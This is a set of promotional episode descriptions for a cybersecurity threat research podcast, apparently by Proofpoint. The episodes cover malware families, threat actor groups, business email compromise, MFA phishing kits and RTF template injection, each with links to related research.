DISCARDED: Tales From the Threat Research Trenches

Send us fan mail!Float like a butterfly. Sting like Bumblebee malware.In this episode, Kelsey Merriman, Threat Research Analyst, and Pim Trouerbach, Senior Reverse Engineer, both with Proofpoint, share their insights from their research of the new malware downloader called Bumblebee. You won’t want to miss their breakdown of Bumblebee’s unique characteristics and their predictions of how its features will develop over time.Join us as we discuss:The difference in tracking Crimeware versus AAPTHow threat actors are using BumblebeeThe exit of BazaLoader malware and its connection to Bumblebee  Check out these resources we mentioned:https://www.proofpoint.com/us/blog/threat-insight/isnt-optimus-primes-bumblebee-its-still-transforminghttps://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti  Keep up with the latest tales from the threat research trenches by subscribing to DISCARDED in Apple Podcasts, Spotify, or wherever you get podcasts. Thanks for listening!

Send us fan mail!Threat actors always take the path of least resistance to their payday. But it's a mistake to think they aren't willing to put in the work to get a human to hand feed them.Their attempts to manipulate their targets into taking action are called social engineering. What role do people play in cybersecurity?In this episode, Daniel Blackford, Threat Researcher at Proofpoint, explains how bad actors capitalize on our humanity to attack us.Join us as we discuss:What lies beneath 95% of cyber attacksThe two factors that reduce people's sensitivity to threatsWhen social engineering content might be waiting for you    Check out these resources we mentioned:https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-mediahttps://www.proofpoint.com/us/blog/threat-insight/triple-threat-north-korea-aligned-ta406-scams-spies-and-stealhttps://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453https://www.bankinfosecurity.com/kansas-man-faces-federal-charges-over-water-treatment-hack-a-16328https://twitter.com/selenalarson/status/1224674562882834432  Keep up with the latest tales from the threat research trenches by subscribing to DISCARDED in Apple Podcasts, Spotify, or wherever you get podcasts. Thanks for listening!

Send us fan mail!When you think about the most costly threat by personal losses, most people will assume ransomware.The real threat, however, is business email compromise (BEC). But why aren’t more companies talking about it, then?In this episode, Tim Kromphardt and Jake G. explain BEC and why organizations need to start paying more attention.Join us as we discuss:The definition of BEC & why companies are paying so little attentionUsing Supernova to defend against email attacksReporting on employment fraud   Check out these resources we mentioned:BEC Taxonomy: https://www.proofpoint.com/us/blog/threat-insight/bec-taxonomy-proofpoint-frameworkSupernova: https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-launches-industrys-first-cloud-native-information-protection-andIC3 Report: https://www.ic3.gov/TOAD blog post: https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-deliveryRailroad theft: https://www.cnn.com/2022/01/14/economy/la-freight-railroad-theft/index.html  Keep up with the latest tales from the threat research trenches by subscribing to DISCARDED in Apple Podcasts, Spotify, or wherever you get podcasts. Thanks for listening!

Send us fan mail!Chinese Threat Actor TA416, otherwise known as Mustang Panda, has been active for a long time, and every time they get knocked down, they get up again. In this episode, Michael Raggi, Senior Threat Researcher, and Pim Trouerbach, Senior Reverse Engineer, both with Proofpoint, give us an overview of TA416 — the “Tubthumping” villains of the threat landscape. Join us as we discuss:The evolving tactics of TA416PlugX malware and control flow flatteningTips for dealing with emerging threats Check out these resources we mentioned:Michael’s Twitter: https://twitter.com/aRtAGGI/status/1501030779480125441 https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-europeanhttps://www.theregister.com/2022/03/09/china_apt41_mandiant_usaherds/ Tubthumping by Chumbawamba  Keep up with the latest tales from the threat research trenches by subscribing to DISCARDED in Apple Podcasts, Spotify, or wherever you get podcasts. Thanks for listening!

Send us fan mail!Cybercriminals. They’re just like us. With the Russia Ukraine conflict, Conti found itself at odds with internal team members over the issue — Eventually leading to self destruction.Which begs the question: Are these organizations as impenetrable as we thought? In this episode, we hear from Andrew Northern, Senior Threat Researcher at Proofpoint, about the resurrection of the Emotet malware, the Conti implosion, and advice to cyber defenders. Join us as we discuss:The journey leading to Emotet’s returnThe importance of the Conti group leaksWhat defenders should be thinking about against cyber threats  Check out this resource we mentioned:Andrew's Twitter: https://mobile.twitter.com/ex_raritas https://acn-marketing-blog.accenture.com/wp-content/uploads/2022/03/UPDATED-ACTI-Global-Incident-Report-Ideological-Divide-Blog-14MARCH22.pdf https://www.wired.com/story/conti-ransomware-russia/https://www.cnn.com/2022/03/30/politics/ukraine-hack-russian-ransomware-gang/index.html   Keep up with the latest tales from the threat research trenches by subscribing to DISCARDED in Apple Podcasts, Spotify, or wherever you get podcasts. Thanks for listening!

Send us fan mail!How are threat actors like Olympic snowboard halfpipe athletes?When their good tricks get stolen by competitors, they add new ones to their repertoire.In this episode, we hear from Joe Wise, Threat Researcher at Proofpoint, about the latest tricks from TA2541 (and why it’s so fun to research that group).Join us as we discuss:Changes that TA2541 has made over timeTheir current strategies and patternsSnowboarding, Home Alone, and what makes TA2541 unique  Check out this resource we mentioned:Charting TA2541's Flight | Proofpoint US Keep up with the latest tales from the threat research trenches by subscribing to DISCARDED in Apple Podcasts, Spotify, or wherever you get podcasts. Thanks for listening!

Send us fan mail!Until recently, threat actors haven’t really invested much time in MFA phish kits because not a lot of people used MFA. (Everyone needs MFA, full stop.)Consequently, threat actors are using more advanced multi-factor authentication-enabled phish kits.Find out why in our first episode of DISCARDED, where we hear from Tim Kromphardt, Email Threat Researcher at Proofpoint, about why MFA kits are sort of like Justin Bieber ticket thieves.Join us as we discuss:How MFA kits differ from ordinary phish kitsWhat threat actors and researchers have in commonA technical dive into transparent reverse proxiesWhy you need multifactor authentication despite the rise of MFA kits  Check out these resources we mentioned during the podcast:MFA PSA, Oh My!Catching Transparent Phish: Analyzing and Detecting MITM Phishing Toolkits  Keep up with the latest tales from the threat research trenches by subscribing to DISCARDED in Apple Podcasts, Spotify, or wherever you get podcasts. Thanks for listening!

Send us fan mail!If you asked for M&M’s and received Skittles, you might pop a few in your mouth, but it won’t take long to realize something’s off.This is exactly what’s happening with RTF files: Instead of the intended attachment, unaware companies are delivering these files and realizing later that they were actually malicious.On this episode of Protecting People, hosts Selena Larson and Crista Giering chat with Michael Raggi, Senior Threat Research Engineer at Proofpoint, about RTF files, template injection, and campaigns using the technique in an effort to make sure customers aren’t being surprised with “Skittles.”Join us as we discuss:The importance of template injectionCampaigns using the techniqueWidespread adoption of the RTF injectionMitigating and monitoring the techniqueResource mentioned:https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespreadFor more episodes like this one, subscribe to us on Apple Podcasts, Spotify, and the Proofpoint website, or just search for Protecting People in your favorite podcast player.